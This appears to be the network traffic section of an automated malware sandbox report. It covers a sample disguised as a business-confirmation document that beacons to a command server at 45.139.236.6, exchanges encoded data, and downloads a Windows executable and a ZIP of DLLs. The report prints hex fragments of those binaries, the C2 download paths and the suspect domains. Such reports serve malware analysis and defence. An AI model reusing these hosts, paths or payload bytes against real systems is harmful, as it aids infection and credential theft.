Mar 30, 2021 14:22:53.374528885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374537945 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374546051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374558926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374568939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374572039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374586105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374603033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374615908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374635935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374655008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374671936 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374672890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374694109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374706984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374711990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374730110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374742985 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374752045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374763966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374767065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.374799013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.374836922 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.376347065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.388421059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.388473034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.388495922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.388516903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.388534069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.388665915 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:54.861716032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:54.861752033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:54.949872017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:54.950095892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:54.950156927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:55.761436939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:55.811427116 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:58.543174028 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:58.543700933 CEST	49743	443	192.168.2.4	195.201.225.248
Mar 30, 2021 14:22:58.543768883 CEST	49744	80	192.168.2.4	45.139.236.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2021 14:21:15.284832954 CEST	59920	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:15.330692053 CEST	53	59920	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:15.514183998 CEST	57458	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:15.568542957 CEST	53	57458	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:16.342711926 CEST	50579	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:16.343705893 CEST	51703	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:16.344470024 CEST	65248	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:16.388626099 CEST	53	50579	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:16.391149998 CEST	53	65248	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:16.391179085 CEST	53	51703	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:19.744138956 CEST	53723	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:19.802051067 CEST	53	53723	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:40.490989923 CEST	64646	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:40.539866924 CEST	53	64646	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:43.944430113 CEST	65298	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:43.990073919 CEST	53	65298	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:45.035861015 CEST	59123	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:45.090435028 CEST	53	59123	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:46.471252918 CEST	54531	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:46.517179966 CEST	53	54531	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:47.726963043 CEST	49714	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:47.781119108 CEST	53	49714	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:50.102624893 CEST	58028	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:50.157056093 CEST	53	58028	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:50.789891958 CEST	53097	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:50.838696957 CEST	53	53097	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:51.888214111 CEST	49257	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:51.934762955 CEST	53	49257	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:53.632455111 CEST	62389	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:53.678374052 CEST	53	62389	8.8.8.8	192.168.2.4
Mar 30, 2021 14:21:54.946530104 CEST	49910	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:21:54.992515087 CEST	53	49910	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:00.100003958 CEST	55854	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:00.146488905 CEST	53	55854	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:01.098542929 CEST	64549	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:01.153105974 CEST	53	64549	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:11.044483900 CEST	63153	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:11.104126930 CEST	53	63153	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:11.239778042 CEST	52991	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:11.297012091 CEST	53	52991	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:25.956614971 CEST	53700	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:26.005354881 CEST	53	53700	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:35.143964052 CEST	51726	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:35.189804077 CEST	53	51726	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:35.672044992 CEST	56794	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:35.728362083 CEST	53	56794	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:39.725234985 CEST	56534	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:39.773957968 CEST	53	56534	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:40.635807037 CEST	56627	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:40.681838989 CEST	53	56627	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:42.115354061 CEST	56621	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:42.469630957 CEST	53	56621	8.8.8.8	192.168.2.4
Mar 30, 2021 14:22:46.125507116 CEST	63116	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:22:46.180718899 CEST	53	63116	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:02.913553953 CEST	64078	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:23:02.959594965 CEST	53	64078	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:05.464485884 CEST	64801	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:23:05.510462999 CEST	53	64801	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:07.462343931 CEST	61721	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:23:07.525099993 CEST	53	61721	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:11.476567030 CEST	51255	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:23:11.522428036 CEST	53	51255	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:12.928796053 CEST	61522	53	192.168.2.4	8.8.8.8
Mar 30, 2021 14:23:12.974716902 CEST	53	61522	8.8.8.8	192.168.2.4
Mar 30, 2021 14:23:14.088263035 CEST	52337	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 30, 2021 14:22:42.115354061 CEST	192.168.2.4	8.8.8.8	0xa083	Standard query (0)	ekocafebali.com	A (IP address)	IN (0x0001)
Mar 30, 2021 14:22:46.125507116 CEST	192.168.2.4	8.8.8.8	0x51d8	Standard query (0)	telete.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 30, 2021 14:22:42.469630957 CEST	8.8.8.8	192.168.2.4	0xa083	No error (0)	ekocafebali.com		111.67.28.15	A (IP address)	IN (0x0001)
Mar 30, 2021 14:22:46.180718899 CEST	8.8.8.8	192.168.2.4	0x51d8	No error (0)	telete.in		195.201.225.248	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

45.139.236.6

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49744	45.139.236.6	80	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2021 14:22:46.680660963 CEST	4263	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 45.139.236.6
Mar 30, 2021 14:22:46.680695057 CEST	4263	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 59 55 5a 66 75 39 79 46 46 71 72 2f 75 71 63 2b 36 73 74 77 42 69 32 4c 43 46 62 7a 77 38 Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3YUZfu9yFFqr/uqc+6stwBi2LCFbzw8I2p4Ut0oWG6jcdbXkMrLQ2vqcBbg9dGI3BT+XAhR/Atg==
Mar 30, 2021 14:22:47.493658066 CEST	4264	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Mar 2021 12:22:47 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Data Raw: 32 35 63 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 63 4d 2b 4b 54 73 6e 35 34 55 79 39 68 38 50 4c 54 49 5a 2b 69 6d 37 49 51 4e 6d 67 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 59 47 70 35 76 30 45 71 53 73 77 4f 4e 48 31 4a 34 67 65 31 62 53 65 30 4f 75 36 34 67 2f 38 39 4a 35 31 74 48 51 36 57 4e 49 4f 58 70 62 72 65 78 68 75 61 31 57 50 46 6b 49 53 49 36 51 58 37 65 63 33 46 36 65 76 4a 56 5a 55 2f 2b 6a 46 4f 68 49 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 53 6c 79 61 64 73 4e 78 2f 59 79 38 73 4e 47 5a 52 52 77 57 2f 48 45 77 43 34 53 32 6c 6c 71 53 72 49 68 64 64 6c 4c 59 38 46 79 47 4a 30 32 5a 34 38 42 67 6a 30 77 34 34 59 69 67 32 55 72 48 64 4d 75 4d 2b 56 35 62 6f 7a 65 34 32 75 62 30 79 59 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 36 79 2f 35 72 49 35 4d 68 77 48 69 4a 7a 58 4d 6f 58 6a 31 6a 62 76 78 4c 64 61 6c 76 50 66 66 58 48 67 67 5a 44 50 72 34 6c 66 45 6f 45 61 6a 79 43 73 47 53 73 71 37 4a 4e 78 59 55 65 4c 79 59 43 37 69 45 57 6f 79 46 6b 37 6b 51 4a 71 33 73 63 54 55 6a 6b 65 34 68 59 47 35 70 6b 41 6e 75 72 76 58 54 56 75 6b 46 31 69 4a 63 41 78 52 34 39 51 6d 73 36 6e 51 65 67 75 56 30 53 69 54 6d 49 33 64 33 69 65 66 51 70 41 73 54 61 51 53 68 6d 2b 42 39 4f 46 38 6e 6a 43 4a 2b 41 77 43 56 6d 4e 6a 31 56 34 55 59 6e 44 73 52 2f 64 39 78 54 57 35 74 69 50 66 79 67 37 35 6f 44 7a 32 4f 71 7a 70 61 50 65 53 73 4d 30 6d 65 43 30 4e 48 65 77 41 4d 34 63 66 7a 4c 2b 66 57 54 39 6f 4d 4c 79 42 37 65 52 4b 69 53 62 6e 70 70 35 4f 69 41 4c 33 33 44 61 67 73 54 77 2b 44 71 6d 73 65 57 41 38 4f 69 52 64 30 61 56 65 4c 51 6a 4a 32 63 37 69 6a 45 4a 35 77 51 69 53 4b 6b 62 74 37 56 6a 50 6f 2b 67 6e 46 6a 57 51 76 4b 73 55 42 79 71 6f 37 39 58 31 41 6c 7a 6e 72 33 66 69 4e 79 39 56 32 4a 6b 43 6c 46 41 54 38 75 78 4e 49 31 2b 36 73 7a 45 41 3d 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 25cunN2GK+nPmcM+KTsn54Uy9h8PLTIZ+im7IQNmg3WAOVMT0Fbn38HbQYGp5v0EqSswONH1J4ge1bSe0Ou64g/89J51tHQ6WNIOXpbrexhua1WPFkISI6QX7ec3F6evJVZU/+jFOhI4b124vbL7XayDSfkgSlyadsNx/Yy8sNGZRRwW/HEwC4S2llqSrIhddlLY8FyGJ02Z48Bgj0w44Yig2UrHdMuM+V5boze42ub0yYV7DnsshUkd1WGfE7lNnlkI36y/5rI5MhwHiJzXMoXj1jbvxLdalvPffXHggZDPr4lfEoEajyCsGSsq7JNxYUeLyYC7iEWoyFk7kQJq3scTUjke4hYG5pkAnurvXTVukF1iJcAxR49Qms6nQeguV0SiTmI3d3iefQpAsTaQShm+B9OF8njCJ+AwCVmNj1V4UYnDsR/d9xTW5tiPfyg75oDz2OqzpaPeSsM0meC0NHewAM4cfzL+fWT9oMLyB7eRKiSbnpp5OiAL33DagsTw+DqmseWA8OiRd0aVeLQjJ2c7ijEJ5wQiSKkbt7VjPo+gnFjWQvKsUByqo79X1Alznr3fiNy9V2JkClFAT8uxNI1+6szEA==0
Mar 30, 2021 14:22:47.594737053 CEST	4265	OUT	GET //l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 45.139.236.6
Mar 30, 2021 14:22:48.132806063 CEST	4266	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Mar 2021 12:22:48 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Thu, 11 Feb 2021 18:55:17 GMT ETag: "60257d95-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
Mar 30, 2021 14:22:48.132913113 CEST	4267	IN	Data Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Mar 30, 2021 14:22:48.132955074 CEST	4269	IN	Data Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc Data Ascii: BZ\|$D$4$!\|$D$4$\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
Mar 30, 2021 14:22:48.132993937 CEST	4270	IN	Data Raw: 04 24 ff d2 c9 c3 31 c0 c3 55 31 c0 ba 01 00 00 00 89 e5 83 ec 10 dd 45 08 dd 5d f0 dd 45 f0 dd 5d f8 dd 45 f0 dd 45 f8 c9 df e9 dd d8 0f 9a c0 0f 45 c2 c3 85 c0 74 4d 0f b6 08 80 b9 60 a4 ea 61 00 89 ca 79 3f 55 80 f9 5b b1 5d 0f 44 d1 b9 01 00 Data Ascii: $1U1E]E]EEEtM`ay?U[]DWVS~8u:TuT0A\0AF[8^_]UWVS1<`a`a)uCu[^_]UEUu1t]]UWVMSU}u1
Mar 30, 2021 14:22:48.133033037 CEST	4271	IN	Data Raw: c0 eb 05 b8 01 00 00 00 83 c4 14 5b 5e 5f 5d c3 55 85 c0 89 e5 79 11 89 c2 f7 da 3d 00 00 00 80 b8 ff ff ff 7f 0f 45 c2 5d c3 55 83 fa 00 89 e5 77 05 83 f8 07 76 07 b9 28 00 00 00 eb 35 83 fa 00 77 07 31 c9 83 f8 01 76 54 b9 28 00 00 00 83 e9 0a Data Ascii: [^_]Uy=E]Uwv(5w1vT(w4v-=v(wvwf/aL]t+UVSX94uDL0911[^]U1@Ht`aiy
Mar 30, 2021 14:22:48.133070946 CEST	4273	IN	Data Raw: ff ff 83 c4 24 5b 5d c3 55 89 e5 53 8d 4d d4 83 ec 30 8b 5a 18 39 58 18 73 15 89 41 10 8b 58 10 85 db 74 06 89 c1 89 d8 eb e8 89 50 10 eb 13 89 51 10 8b 5a 10 85 db 74 06 89 d1 89 da eb d3 89 42 10 8b 45 e4 83 c4 30 5b 5d c3 8b 48 18 8b 50 1c 55 Data Ascii: $[]USM0Z9XsAXtPQZtBE0[]HPUJHQP@J,]UE]@0U1WVMSEu]y4A89tBV1A8;Y$^V0vY$[^_]UWVSM2xur9-\|;]w&9\|
Mar 30, 2021 14:22:48.133111000 CEST	4273	IN	Data Raw: 04 5d c3 55 89 e5 53 89 c3 83 ec 14 8b 40 04 8b 40 38 89 04 24 e8 f0 ee ff ff c6 43 0a 00 83 c4 14 5b 5d c3 55 89 e5 8b 45 08 5d a3 98 8b e9 61 31 c0 c3 55 89 e5 57 56 53 53 80 78 09 00 88 4d f3 74 44 8b 70 04 89 c7 3b 46 4c 74 0b f6 46 16 40 b8 Data Ascii: ]US@@8$C[]UE]a1UWVSSxMtDp;FLtF@u1^Ht(;;t9SuE8CtufN[1Z[^_]xDx2UV1SCD9}D
Mar 30, 2021 14:22:48.133153915 CEST	4274	IN	Data Raw: 78 46 8b 40 48 e8 38 fd ff ff eb e9 8b 43 74 8b 40 48 e8 2b fd ff ff c6 43 44 ff 5b 5e 5d c3 83 fa 01 76 42 55 b9 05 00 00 00 89 e5 57 56 89 c6 53 8b 40 24 89 d3 31 d2 f7 f1 31 d2 8d 78 01 8d 43 fe 5b f7 f7 31 d2 0f af c7 89 c1 a1 b0 8a e9 61 f7 Data Ascii: xF@H8Ct@H+CD[^]vBUWVS@$11xC[1av ^_]PA9D1UWVS@US4Ez$A+E1CU9LfQQ+UfQ^_[^_]UWVS$EMEE8EU}v&ZEBu
Mar 30, 2021 14:22:48.133193970 CEST	4276	IN	Data Raw: 8b 40 10 c7 45 f8 00 00 00 00 c7 45 fc 00 00 00 00 89 14 24 8d 55 f8 e8 9f eb ff ff 8b 45 f8 8b 55 fc c9 c3 55 89 e5 57 56 53 89 c3 83 ec 24 dd 00 dd 14 24 dd 5d d8 e8 5e ff ff ff 89 45 e0 89 55 e4 df 6d e0 dd 45 d8 df e9 dd d8 7a 2c 75 2a 89 c6 Data Ascii: @EE$UEUUWVS$$]^EUmEz,u*rwCSf%>fC$[^_]UHt@Pt@ ;Pl1]HlU~kHhfQ]USy@lP<a{QukAh[]US
Mar 30, 2021 14:22:48.133234978 CEST	4277	IN	Data Raw: 8b 02 5d c3 55 89 e5 57 56 53 89 d6 89 cb 8d 55 e0 8d 4d e4 89 c7 83 ec 4c c7 45 e0 00 00 00 00 c7 45 e4 00 00 00 00 8b 03 89 55 d0 89 4d d4 89 44 24 14 8d 43 08 89 44 24 10 8b 06 89 4c 24 04 89 3c 24 89 44 24 0c 8d 46 08 89 44 24 08 ff 57 20 85 Data Ascii: ]UWVSUMLEEUMD$CD$L$<$D$FD$W MU2FVt^CSEtsEL[^_]USEXHEX1[]UE8uURP&1]UWVS1Mt<.tCt&\$L$
Mar 30, 2021 14:22:48.221698046 CEST	4279	IN	Data Raw: 8b 0c f0 8b 45 08 89 0c 24 89 44 24 04 89 4d ec e8 9e e0 ff ff 85 c0 8b 4d ec 75 0a 8b 45 f0 89 fa e8 ef fe ff ff 46 eb d0 83 c4 10 5b 5e 5f 5d c3 55 89 e5 53 8b 4d 0c 8b 45 08 80 39 9e 75 15 8b 50 18 8b 59 2c 39 5a 0c 75 0a 8b 00 83 c1 2c e8 c0 Data Ascii: E$D$MMuEF[^_]USME9uPY,9Zu,1[]US]C$E18E<C$1[]UWVSU1;s}EOEtCtFEUC@
Mar 30, 2021 14:22:51.396064043 CEST	5218	OUT	GET //l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 45.139.236.6
Mar 30, 2021 14:22:51.930301905 CEST	5220	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Mar 2021 12:22:51 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Thu, 11 Feb 2021 18:55:16 GMT ETag: "60257d94-2b281b" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 